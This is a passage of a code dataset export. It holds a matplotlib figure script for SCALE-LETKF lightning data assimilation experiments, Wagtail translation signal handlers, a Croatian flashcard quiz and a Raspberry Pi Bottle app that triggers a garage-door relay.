patches\n\nfrom matplotlib.colors import BoundaryNorm\n\nfrom tools_LT import read_evar_only, setup_12p\n\nquick = True\n#quick = False\n\ndef read_vars( INFO, tlev=0, HIM8=True ):\n\n # Read variables\n if HIM8:\n fn_Him8 = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"Him8_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_Him8 )\n nc = Dataset(fn_Him8, 'r', format='NETCDF4')\n tbb = nc.variables[\"tbb\"][tlev,:,:,:]\n nc.close()\n else:\n tbb = np.zeros(1)\n\n fn_radar = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"radar_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_radar, tlev )\n nc = Dataset(fn_radar, 'r', format='NETCDF4')\n if INFO[\"TYPE\"] is \"fcst\":\n z = nc.variables[\"z\"][tlev,:,:,:]\n vr = nc.variables[\"vr\"][tlev,:,:,:]\n else:\n z = nc.variables[\"z\"][:,:,:]\n vr = nc.variables[\"vr\"][:,:,:]\n nc.close()\n\n return( tbb, z, vr )\n\ndef main( INFO, EXP1=\"2000m_DA_0306\", EXP2=\"2000m_DA_0306\", NEXP=\"2000m_NODA_0306\",tlev=0, typ=\"anal\", tit_l=[], vname1=\"QHYD\", vname2=\"QCRG\", zlev_show=1, \n LOC=True ):\n\n data_path = \"../../dat4figs/Fig11\"\n os.makedirs( data_path, exist_ok=True )\n\n\n print( tlev, INFO[\"DT\"]*tlev )\n\n #ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n ctime = INFO[\"time0\"] + timedelta(seconds=INFO[\"DT\"]*tlev ) \n if typ is not \"fcst\":\n ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n\n INFO[\"EXP\"] = EXP1\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = typ\n if typ is not \"fcst\":\n INFO[\"time0\"] = ctime\n\n print(\"CHECK\", INFO[\"time0\"] )\n# tbb_exp1, z_exp1, vr_exp1 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp1 = read_evar_only( INFO, tlev=tlev, vname=vname2 )\n# eqh_exp1 = read_evar_only( INFO, tlev=tlev, vname=vname1 ) \n# if vname1 != \"U\" and vname1 != \"V\" and vname1 != \"W\" and vname1 != \"T\":\n# eqh_exp1 = eqh_exp1 * 1.e3\n# efp_exp1 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n#\n# INFO[\"EXP\"] = EXP2\n# tbb_exp2, z_exp2, vr_exp2 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp2 = read_evar_only( INFO, tlev=tlev, vname=vname2 )\n# eqh_exp2 = read_evar_only( INFO, tlev=tlev, vname=vname1 )\n# if vname2 != \"U\" and vname2 != \"V\" and vname2 != \"W\" and vname1 != \"T\":\n# eqh_exp2 = eqh_exp2 * 1.e3\n# efp_exp2 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n\n ft_sec = int( INFO[\"DT\"]*tlev )\n\n\n # nature run\n # read variables\n INFO[\"EXP\"] = NEXP\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = \"fcst\"\n INFO[\"time0\"] = datetime(2001, 1, 1, 1, 0)\n tlev_nat = int( ( ctime - datetime(2001, 1, 1, 1, 0) ).total_seconds() / INFO[\"DT\"] )\n print( \"DEBUG\", tlev_nat, ctime)\n# tbb_nat, z_nat, vr_nat = read_vars( INFO, tlev=tlev_nat, HIM8=False )\n# evar_nat = read_evar_only( INFO, tlev=tlev_nat, vname=vname2 )\n# efp_nat = read_evar_only( INFO, tlev=tlev_nat, vname=\"FP\" )\n# ew_nat = read_evar_only( INFO, tlev=tlev_nat, vname=\"W\" )\n# qh_nat = read_evar_only( INFO, tlev=tlev_nat, vname=vname1 ) \n# if vname1 != \"U\" and vname1 != \"V\" and vname1 != \"W\":\n# qh_nat = qh_nat * 1.e3\n \n\n# print(\"evars: \", evar_nat.shape, evar_exp1.shape, evar_exp2.shape )\n\n\n if typ is \"fcst\":\n foot = \"\\n(fcst from mean)\"\n if ft_sec == 0:\n foot = \"\\n(analysis)\"\n foot = \"\" # DEBUG\n tit_l_ = [\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n \"\",\n ]\n else:\n foot = \"\"\n tit_l_ = [\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n tit_l[0] + foot, \n tit_l[1] + foot, \n tit_l[2],\n ]\n\n# print( z_nat.shape, z_exp1.shape, z_exp2.shape )\n\n\n\n\n\n ax_l, crs_l, fig = setup_12p()\n\n\n levs_dbz= np.array([15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65])\n cmap_dbz = mcolors.ListedColormap(['cyan','dodgerblue', \n 'lime', 'limegreen','yellow',\n 'orange', 'red', 'firebrick', 'magenta',\n 'purple'])\n cmap_dbz.set_under('w', alpha=1.0)\n cmap_dbz.set_over('gray', alpha=1.0)\n\n cmap_rb = plt.cm.get_cmap(\"RdBu_r\")\n cmap_rb.set_under('gray', alpha=1.0)\n cmap_rb.set_over('gray', alpha=1.0)\n\n cmap_dbz = mcolors.ListedColormap(['cyan','dodgerblue',\n 'lime', 'limegreen','yellow',\n 'orange', 'red', 'firebrick', 'magenta',\n 'purple'])\n cmap_dbz.set_under('w', alpha=1.0)\n cmap_dbz.set_over('gray', alpha=1.0)\n\n unit_dbz = \"(dBZ)\"\n unit_crg = r'(nC m$^{-3}$)'\n \n if vname2 == \"QCRG\" or vname2 == \"CR\":\n levs_rb_qcrg = np.array([-0.4, -0.3, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.3, 0.4, ])\n else:\n levs_rb_qcrg = np.array([ -2.4, -2.0, -1.6, -1.2, -0.8, -0.4, \n 0.4, 0.8, 1.2, 1.6, 2, 2.4])\n\n if vname1 == \"QHYD\":\n levs_dbz = np.array([0.5, 1, 2, 4, 6, 8, 10, 12, 14, 16])\n else:\n levs_dbz = np.array([0.5, 1, 2, 3, 4, 5, 6, 7, 8, 10])\n\n\n if vname2 == \"U\" or vname2 == \"V\" or vname2 == \"W\":\n levs_rb_qcrg = np.array([ -36, -30, -24, -18, -12, -6, \n 6, 12, 18, 24, 30, 36])\n\n if vname1 == \"U\" or vname1 == \"V\" or vname1 == \"W\":\n levs_dbz = np.array([ -36, -30, -24, -18, -12, -6, \n 6, 12, 18, 24, 30, 36])\n cmap_dbz = cmap_rb\n\n\n if vname2 == \"T\":\n levs_rb_qcrg = np.array([ -36, -30, -24, -18, -12, -6, \n 6, 12, 18, 24, 30, 36])\n levs_rb_qcrg = np.arange(228, 280, 2)\n unit_crg = \"(K)\"\n \n\n levs_rb_qcrg = np.array([-0.6, -0.4, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.4, 0.6])\n\n levs_l = [ levs_dbz, levs_dbz, levs_dbz, \n levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg,\n levs_dbz, levs_dbz, levs_dbz, levs_dbz, levs_dbz, levs_dbz,\n levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg, ]\n\n cmap_l = [ cmap_dbz, cmap_dbz, cmap_dbz, \n cmap_rb, cmap_rb, cmap_rb,\n cmap_dbz, cmap_dbz, cmap_dbz, cmap_dbz, cmap_dbz, cmap_dbz,\n cmap_rb, cmap_rb, cmap_rb, cmap_rb, cmap_rb, cmap_rb ]\n unit_l = [ unit_dbz, unit_dbz, unit_dbz,\n unit_crg, unit_crg, unit_crg,\n unit_dbz, unit_dbz, unit_dbz,\n unit_crg, unit_crg, unit_crg ]\n\n pnum_l = [\n \"(a)\", \"(b)\", \"(c)\",\n \"(d)\", \"(e)\", \"(f)\",\n ]\n\n tvar = vname2\n if vname2 is \"QCRG\":\n levs = levs_rb_qcrg\n cmap = cmap_rb\n unit = unit_crg\n tvar = \"Total charge density\"\n\n\n bbox = { 'facecolor':'w', 'alpha':0.95, 'pad':1.5, 'edgecolor':'w' }\n\n\n xmin = 120\n xmax = 280\n ymin = 120\n ymax = 320\n zmin = 0.0\n zmax = 15.0\n\n ft_sec_a = int( ( ctime - INFO[\"time00\"] ).total_seconds() )\n print( \"ctime\",ctime, tlev, INFO[\"DT\"])\n\n \n xlabel = \"X (km)\"\n ylabel = \"Y (km)\"\n zlabel = \"Z (km)\"\n\n xaxis = INFO[\"X\"][:] * 0.001\n yaxis = INFO[\"Y\"][:] * 0.001\n\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n xdgrid = 20\n ydgrid = 20\n\n\n# cy, cx = np.unravel_index( np.argmax(z_nat[zlev_show,:,:]), ew_nat[0,0,:,:].shape)\n\n# cx = 76\n# cy = 89\n\n# print(\"CX,CY:\", cx, cy)\n\n #cx = 98\n #cy = 106\n\n #cx = 100\n #cy = 111\n\n #cx = 84\n #cy = 95\n\n #cx = 90\n #cy = 93\n\n cx = 90\n cy = 89\n\n if typ is not \"fcst\":\n info = 't={0:.0f}min\\nZ={1:}km'.format( ft_sec_a/60, INFO[\"Z\"][zlev_show]/1000)\n else:\n info = 't={0:.0f}min\\n(FT={1:.0f}min)\\nZ={2:}km'.format( ft_sec_a/60, ft_sec/60, INFO[\"Z\"][zlev_show]/1000)\n \n\n if typ != \"fcst\":\n VAR_l = [ ]\n# z_exp1[zlev_show,:,:], \n# z_exp2[zlev_show,:,:], \n# z_nat[zlev_show,:,:],\n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:],\n# np.transpose( z_exp1[:,:,cx] ), \n# np.transpose( z_exp2[:,:,cx] ), \n# np.transpose( z_nat[:,:,cx] ), ]\n else:\n VAR_l = [ \n# #z_exp1[zlev_show,:,:], \n# #z_exp2[zlev_show,:,:], \n# #z_nat[zlev_show,:,:], \n# eqh_exp1[0,zlev_show,:,:], \n# eqh_exp2[0,zlev_show,:,:], \n# qh_nat[0,zlev_show,:,:], \n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:],\n# #np.transpose( z_exp1[:,:,cx] ), \n# #z_exp1[:,cy,:], \n# np.transpose( eqh_exp1[0,:,:,cx] ), \n# eqh_exp1[0,:,cy,:], \n# #np.transpose( z_exp2[:,:,cx] ), \n# #z_exp2[:,cy,:], \n# np.transpose( eqh_exp2[0,:,:,cx] ), \n# eqh_exp2[0,:,cy,:], \n# #np.transpose( z_nat[:,:,cx] ), \n# #z_nat[:,cy,:], \n# np.transpose( qh_nat[0,:,:,cx] ), \n# qh_nat[0,:,cy,:], \n# np.transpose( evar_exp1[0,:,:,cx]), \n# evar_exp1[0,:,cy,:], \n# np.transpose( evar_exp2[0,:,:,cx] ), \n# evar_exp2[0,:,cy,:], \n# np.transpose( evar_nat[0,:,:,cx] ),\n# evar_nat[0,:,cy,:],\n ]\n# FP_l = [ np.sum( efp_exp1[0,:,:,:], axis=0 ), \n# np.sum( efp_exp2[0,:,:,:], axis=0 ), \n# np.sum( efp_nat[0,:,:,:], axis=0 ),\n# np.sum( efp_exp1[0,:,:,:], axis=0 ),\n# np.sum( efp_exp2[0,:,:,:], axis=0 ),\n# np.sum( efp_nat[0,:,:,:], axis=0 ), \n# ]\n\n\n# if LOC:\n# inf = \"/data_honda01/honda/SCALE-LETKF/scale-LT/OUTPUT/\" + EXP2 + \"/loc.txt\"\n# loc_data = np.loadtxt( inf, delimiter=\",\", dtype='float32')\n\n for idx, ax in enumerate(ax_l):\n print(\"DEBUG\", idx, crs_l[idx]) \n\n fn = '{0:}/data{1:0=2}.npz'.format( data_path, idx )\n print( fn )\n\n xdgrid_ = xdgrid\n ydgrid_ = ydgrid\n\n xmin_ = xmin\n ymin_ = ymin\n xmax_ = xmax\n ymax_ = ymax\n\n\n if crs_l[idx] == \"ZY\":\n xaxis = INFO[\"Z\"][:] * 0.001\n yaxis = INFO[\"Y\"][:] * 0.001\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n\n ymin_ = zmin\n ymax_ = zmax\n\n ax.hlines( y=INFO[\"Z\"][zlev_show]*0.001, xmin=xmin_, xmax=xmax_,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n ax.vlines( x=INFO[\"X\"][cx]*0.001, ymin=ymin_, ymax=ymax_,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n\n ydgrid_ = 2\n xdgrid_ = 20\n\n elif crs_l[idx] == \"XZ\":\n xaxis = INFO[\"Y\"][:] * 0.001\n yaxis = INFO[\"Z\"][:] * 0.001\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n\n xmin_ = zmin\n xmax_ = zmax\n\n ax.hlines( y=INFO[\"Y\"][cy]*0.001, xmin=xmin_, xmax=xmax_,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n ax.vlines( x=INFO[\"Z\"][zlev_show]*0.001, ymin=ymin, ymax=ymax,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n\n\n xdgrid_ = 2\n ydgrid_ = 20\n\n elif crs_l[idx] == \"XY\":\n ax.vlines( x=INFO[\"X\"][cx]*0.001, ymin=ymin, ymax=ymax,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n ax.hlines( y=INFO[\"Y\"][cy]*0.001, xmin=xmin, xmax=xmax,\n colors=\"k\",linestyles='dotted',linewidths=1.0 )\n\n# print( VAR_l[idx].shape, x2d.shape, np.max(VAR_l[idx]))\n\n norm = BoundaryNorm(levs_l[idx], ncolors=cmap_l[idx].N, clip=True)\n\n# np.savez( fn, data=VAR_l[idx][:,:], locx=loc_data[:,0],\n# locy=loc_data[:,1] )\n data = np.load( fn )['data']\n locx = np.load( fn )['locx']\n locy = np.load( fn )['locy']\n\n #SHADE = ax.pcolormesh(x2d, y2d,\n SHADE = ax.contourf(x2d, y2d,\n data,\n #VAR_l[idx][:,:],\n levels=levs_l[idx],\n #vmin=np.min(levs),\n #vmax=np.max(levs),\n cmap=cmap_l[idx],\n extend='both',\n norm=norm,\n )\n\n if LOC:\n if ( idx == 1 or idx == 4 ) and tlev == 0:\n #ax.scatter( INFO[\"X\"][loc_data[:,0]-1]*0.001, \n # INFO[\"Y\"][loc_data[:,1]-1]*0.001, \n# ax.scatter( loc_data[:,0],\n# loc_data[:,1],\n ax.scatter( locx,\n locy,\n marker='s', s=5, linewidths=0.3,\n edgecolors='k', facecolors=\"None\", alpha=1.0,\n )\n\n if typ is \"fcst\" and ft_sec > 0 and idx <= 5:\n ssize = 10.0\n idx_ = idx\n if idx > 2:\n idx_ = idx - 3\n fp2d = FP_l[idx_] \n #fp2d[ fp2d < 1.0 ] = np.nan\n #fp2d = fp2d / ssize\n fp2d = np.where( fp2d >= 1.0, ssize, np.nan )\n ax.scatter( x2d, y2d, s=fp2d, \n c='k', marker='s', \n edgecolors=\"w\", linewidths=0.5 )\n\n ax.set_xlim( xmin_, xmax_ )\n ax.set_ylim( ymin_, ymax_ )\n\n ax.xaxis.set_ticks( np.arange(xmin_, xmax_, xdgrid_) )\n ax.yaxis.set_ticks( np.arange(ymin_, ymax_, ydgrid_) )\n ax.tick_params(axis='both', which='minor', labelsize=6 )\n ax.tick_params(axis='both', which='major', labelsize=6 )\n \n if idx <= 5:\n ax.text(0.5, 0.95, tit_l_[idx],\n fontsize=12, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n\n ax.text(0.1, 0.95, pnum_l[idx],\n fontsize=10, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n\n\n xlabel_ = xlabel\n ylabel_ = ylabel\n if crs_l[idx] == \"XZ\":\n ylabel_ = \"\"\n xlabel_ = zlabel\n elif crs_l[idx] == \"ZY\":\n xlabel_ = \"\"\n ylabel_ = zlabel\n\n ax.set_xlabel( xlabel_, fontsize=6 )\n ax.set_ylabel( ylabel_, fontsize=6 )\n\n if idx <= 5:\n \n pos = ax.get_position()\n #cb_h = pos.height\n #cb_w = 0.01\n cb_h = 0.01\n cb_w = pos.width * 1.5\n ax_cb = fig.add_axes( [pos.x0, pos.y0-0.06, cb_w, cb_h] )\n cb = plt.colorbar( SHADE, cax=ax_cb, orientation = 'horizontal', \n ticks=levs_l[idx], extend='both' )\n cb.ax.tick_params( labelsize=6 )\n ax.text( 1.15, -0.12, unit_l[idx],\n fontsize=8, transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='top', )\n \n if idx == 2 or idx == 5:\n ax.text( 1.1, 1.2, info,\n fontsize=9, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='bottom', )\n\n if idx == 9 or idx == 15:\n tvar_ = tvar\n if idx == 9:\n if vname1 == \"QHYD\":\n tvar_ = \"Total hydrometeor\"\n else:\n tvar_ = vname1\n ax.text( 0.5, 1.15, tvar_,\n fontsize=13, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='center', )\n\n# fig_tit = tvar\n# fig.suptitle( fig_tit, fontsize=16 )\n\n\n #odir = 'png/18p_DA_var/{0:}/i{1:03}_j{2:03}'.format( EXP2, cx, cy )\n odir = 'pdf/fig20210624/18p_DA_var/{0:}/i{1:03}_j{2:03}'.format( EXP2, cx, cy )\n\n ofig = '18p_{0:}_{1:}_{2:}_fta{3:05}_ft{4:05}_z{5:0=2}_{6:}_{7:}.pdf'.format(typ, EXP1, EXP2, ft_sec_a, ft_sec, zlev_show, vname1, vname2)\n\n\n print( ofig, odir )\n \n if not quick:\n os.makedirs(odir, exist_ok=True)\n plt.savefig(os.path.join(odir,ofig),\n bbox_inches=\"tight\", pad_inches = 0.1)\n plt.cla()\n plt.clf()\n plt.close('all')\n else:\n plt.show()\n\n\n\n\n###################\n\nDX = 2000.0\nDY = 2000.0\nXDIM = 192\nYDIM = 192\nTDIM = 13\nZDIM = 40\n\nXDIM = 176\nYDIM = 176\nZDIM = 45\n\nDZ = 500.0\nDT = 300\n\nX = np.arange( DX*0.5, DX*XDIM, DX )\nY = np.arange( DY*0.5, DY*YDIM, DY )\nT = np.arange( 0, DT*TDIM, DT )\nBAND = np.arange( 7, 17, 1 )\n\nZ = np.arange(DZ*0.5, DZ*ZDIM, DZ)\n\n#EXP = \"2000m_NODA_1022_FIR2km_N\"\n#time0 = datetime( 2001, 1, 1, 1, 0, 0 )\nEXP = \"2000m_DA_1022_FIR2km_N\"\n\nEXP = \"2000m_DA_0302\"\n\n\ntime0 = datetime( 2001, 1, 1, 1, 20, 0 ) \ntime0 = datetime( 2001, 1, 1, 1, 30, 0 ) \ntime0 = datetime( 2001, 1, 1, 2, 0, 0 ) \n#time0 = datetime( 2001, 1, 1, 1, 40, 0 ) \n\nGTOP = \"/data_honda01/honda/SCALE-LETKF/scale-LT/OUTPUT\"\nTYPE = \"fcst\"\nMEM = \"mean\"\nMEM = \"0025\"\ntime00 = datetime( 2001, 1, 1, 0, 0, 0 )\n\nINFO = {\"XDIM\":XDIM, \"YDIM\":YDIM, \"NBAND\":10, \"TDIM\":TDIM,\n \"X\":X, \"Y\":Y , \"BAND\":BAND, \"T\":T, \"GTOP\":GTOP,\n \"ZDIM\":ZDIM, \"Z\":Z, \"DT\":DT,\n \"TYPE\":TYPE, \"MEM\":MEM, \"EXP\":EXP,\n \"time0\": time0, \"time00\": time00 }\n\ntmax = 13\ntmax = 7\n\ntmin = 0\n#tmin = 1\ntmax = 1\n#tmin = 1\n#tmax = 7\n\ntyp = \"anal\"\ntyp = \"fcst\"\n\nvname = \"QCRG\"\n\ntit_l = [\"NODA\", \"DA\", \"Nature run\"]\n\n\nEXP1 = \"2000m_DA_0723_NOFP_30min\"\n\nEXP2 = \"2000m_DA_0723_FP_30min_LOC10km_VLOC30km\"\nEXP2 = \"2000m_DA_0723_FP_30min_LOC30km\"\n\nNEXP = \"2000m_NODA_0723\"\n\ntit_l = [\"GUESS\", \"ANAL\", \"Nature run\"]\n#tit_l = [\"GUESS\", \"ANAL(HT8)\", \"Nature run\"]\ntit_l = [\"NO GLMDA\", \"GLMDA\", \"Nature run\"]\n\n\nvname1 = \"QR\"\nvname2 = \"CR\"\n#vname1 = \"QG\"\n#vname2 = \"CG\"\n#vname1 = \"QS\"\n#vname2 = \"CS\"\n#vname1 = \"QHYD\"\n#vname2 = \"QCRG\"\n\nvname1_l = [ \n \"QHYD\", \n# \"QV\", \n# \"W\", \n# \"QR\",\n# \"QG\", \n# \"QS\", \n ]\n\nvname2_l = [ \n \"QCRG\", \n# \"T\", \n# \"V\", \n# \"CR\",\n# \"CG\", \n# \"CS\", \n ]\n\nzlev_min = 6\nzlev_max = 28\ndz = 4\n\nzlev_min = 14\ndz = 1\nzlev_max = zlev_min + dz\nzlev_max = zlev_min + 6\nzlev_max = zlev_min \n\nif typ is not \"fcst\":\n tmin = 1\n\nLOC = False\nLOC = True #False\n\nfor tlev in range( tmin, tmax ):\n if tlev > 0:\n tit_l = [\"NO GLM DA\\nforecast\", \"GLM DA\\nforecast\", \"Nature run\"]\n\n for zlev_show in range( zlev_min, zlev_max+dz, dz):\n for idx, vname1 in enumerate(vname1_l):\n INFO[\"time0\"] = time0\n main( INFO, EXP1=EXP1, EXP2=EXP2, NEXP=NEXP, tlev=tlev, typ=typ, tit_l=tit_l, vname1=vname1, vname2=vname2_l[idx], zlev_show=zlev_show, LOC=LOC )\n","sub_path":"src/Fig11_repo.py","file_name":"Fig11_repo.py","file_ext":"py","file_size_in_byte":19742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"233730736","text":"from django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models.signals import post_save, pre_delete\nfrom wagtail.wagtailcore.models import Site, get_page_models\n\nfrom wagtailtrans.models import Language, TranslatablePage\nfrom wagtailtrans.permissions import (\n create_group_permissions, get_or_create_language_group)\n\n\ndef synchronize_trees(sender, instance, **kwargs):\n \"\"\"synchronize the translation trees when\n a TranslatablePage is created.\n\n :param sender: Sender model\n :param instance: TranslatablePage instance\n :param kwargs: kwargs e.g. created\n\n \"\"\"\n if (\n not kwargs.get('created') or\n not getattr(instance, 'language', False) or\n not instance.language.is_default\n ):\n return\n\n try:\n instance.get_site()\n except ObjectDoesNotExist:\n return\n\n for lang in Language.objects.filter(is_default=False):\n instance.create_translation(language=lang, copy_fields=True)\n\n\ndef synchronize_deletions(sender, instance, **kwargs):\n \"\"\"We use pre_delete because when sync is disabled the foreign_key on\n canonical pages on_delete is set_null.\n\n :param sender: Sender model\n :param instance: TranslatablePage Instance\n :param kwargs: kwargs\n\n \"\"\"\n language = getattr(instance, 'language', False)\n if language and instance.is_canonical:\n instance.get_translations(only_live=False).delete()\n\n\ndef create_new_language_tree(sender, instance, **kwargs):\n \"\"\"Signal will catch creation of a new language\n If sync trees is enabled it will create a whole new tree with\n correlating language.\n\n :param sender: Sender model\n :param instance: Language instance\n :param kwargs: kwargs e.g. created\n\n \"\"\"\n if not kwargs.get('created'):\n return\n\n for site in Site.objects.all():\n site_pages = site.root_page.get_children().values_list('pk', flat=True)\n canonical_home_page = (\n TranslatablePage.objects\n .filter(pk__in=site_pages, language=Language.objects.default())\n .first())\n if not canonical_home_page:\n # no pages created yet.\n return\n descendants = canonical_home_page.get_descendants(inclusive=True)\n for child_page in descendants:\n child_page.specific.create_translation(instance, copy_fields=True)\n\n\ndef create_language_permissions_and_group(sender, instance, **kwargs):\n \"\"\"Create a new `Translator` role with it's required permissions.\n\n :param sender: Sender model\n :param instance: Language instance\n :param kwargs: kwargs e.g. created\n\n \"\"\"\n if not kwargs.get('created'):\n return\n\n group = get_or_create_language_group(instance)\n create_group_permissions(group, instance)\n\n\ndef register_signal_handlers():\n \"\"\"Registers signal handlers.\n\n To create a signal for TranslatablePage we have to use wagtails\n get_page_model.\n\n \"\"\"\n post_save.connect(create_language_permissions_and_group, sender=Language)\n\n if settings.WAGTAILTRANS_SYNC_TREE:\n post_save.connect(create_new_language_tree, sender=Language)\n\n for model in get_page_models():\n if hasattr(model, 'create_translation'):\n post_save.connect(synchronize_trees, sender=model)\n\n if hasattr(model, 'get_translations'):\n pre_delete.connect(synchronize_deletions, sender=model)\n","sub_path":"src/wagtailtrans/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"341098067","text":"import random\r\nlodg = []\r\nlpit = []\r\nred = []\r\nlbr = []\r\nlpon = []\r\nln = []\r\nodg = ''\r\nto = no = x = r = 0\r\nprint('Dobrodošli u flashcards-type igru za ponavljanje!\\nUbacite popis/e pojmova u isti folder koji su s znakom - odvojeni od svoje definicije/značenja/itd. Svaki pojam mora biti u novom redu.')\r\nime = input('Naziv datoteke: ')\r\nfile = open(ime,'r')\r\nlredovi = file.readlines()\r\nfor i in range(len(lredovi)):\r\n red = lredovi[i]\r\n a = red.split('-')\r\n lodg.append(a[0])\r\n lpit.append(a[1].replace('\\n',''))\r\n lbr.append(i)\r\nif len(lbr)>20:\r\n lpon = ['a','b','c','d','e','f','g','h']\r\nelif len(lbr)>10:\r\n lpon = ['a','b','c','d']\r\nelif len(lbr)>5:\r\n lpon = ['a','b']\r\nwhile 'KRAJ' not in odg:\r\n x = int(random.choice(lbr))\r\n print(lpit[x])\r\n odg = input()\r\n if odg in lodg[x] and odg not in 'KRAJ':\r\n to += 1\r\n elif odg not in lodg[x] and odg not in 'KRAJ':\r\n no += 1\r\n ln.append(x)\r\n lbr.remove(x)\r\n lpon.append(x)\r\n r = lpon.pop(0)\r\n if isinstance(r,int) == True:\r\n lbr.insert(r,r)\r\nfile.close\r\nprint('Točnih odgovora je bilo {}, a netočnih {}. Spremi igru (Y/N)?'.format(to,no))\r\ns = input()\r\nif s in 'Y':\r\n file = open(ime, 'a')\r\n file.write('\\n')\r\n for i in range(len(ln)):\r\n sbr = ln[i]\r\n save = lodg[sbr] + '-' + lpit[sbr] + '\\n'\r\n file.write(save)\r\nfile.close()\r\n","sub_path":"Golob_inf.py","file_name":"Golob_inf.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"543498041","text":"\"\"\"\nfound a bunch of info here:\nhttps://gist.github.com/johnwargo/ea5edc8516b24e0658784ae116628277\n\"\"\"\n\nimport sys\nimport gpiozero\nimport time\nfrom bottle import route, run, post, request, redirect\nfrom datetime import datetime\n\n\ndef logger(textMsg):\n \"\"\"Provides a consistent methond for writing log file.\"\"\"\n try:\n log = open(LOGFILE,\"a\")\n log.write(textMsg+\"\\n\")\n log.close()\n except:\n print(\"Very bad error writing to log file!!!\")\n\n\ndef set_relay(status):\n if status:\n print(\"Setting relay: ON\")\n relay.on()\n else:\n print(\"Setting relay: OFF\")\n relay.off()\n\n\ndef toggle_relay():\n \"\"\"Changes state of relay.\"\"\"\n print(\"toggling relay\")\n relay.toggle()\n\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n# What the user sees when they first arrive\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n@route('/', method=['GET', 'POST'])\ndef index():\n returnTxt = '''\n\n\n\t\n\t\t\n\t\n\t\n\t
    \n\t
    \n\t
    \n\t \n\t
    \n\t
    \n\t
    \n\t\n'''\n return returnTxt\n\n\n@post('/deploy')\ndef deploy():\n ipaddr = request.environ['REMOTE_ADDR']\n now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n logstr = now + \" - Door trigger from \" + ipaddr\n logger(logstr)\n set_relay(True)\n time.sleep(.75)\n set_relay(False)\n redirect(\"/\")\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n# main program starts here... nothing really happens...\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n\ndef main():\n \"\"\"This program will present two buttons to the user. Each\n buton will open one of the garage doors.\n \"\"\"\n # change this value based on which GPIO port the relay is connected to\n # create a relay object.\n # Triggered by the output pin going low: active_high=False.\n # Initially off: initial_value=False\n now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n logger(now + \" - Program starting up.\")\n run(host='0.0.0.0', port=80, server=\"paste\")\n\n\nRELAY_PIN = 4\nLOGFILE = \"/var/log/garage.log\"\nrelay = gpiozero.OutputDevice(RELAY_PIN, active_high=False, initial_value=False)\n\nif __name__ == '__main__':\n ''' try:\n main()\n except:\n set_relay(False)\n print(\"\\nExiting application\")\n sys.exit(0)\n'''\n main()\n","sub_path":"garage.py","file_name":"garage.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"438079071","text":"# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You may\n# not use this file except in compliance with the License. A 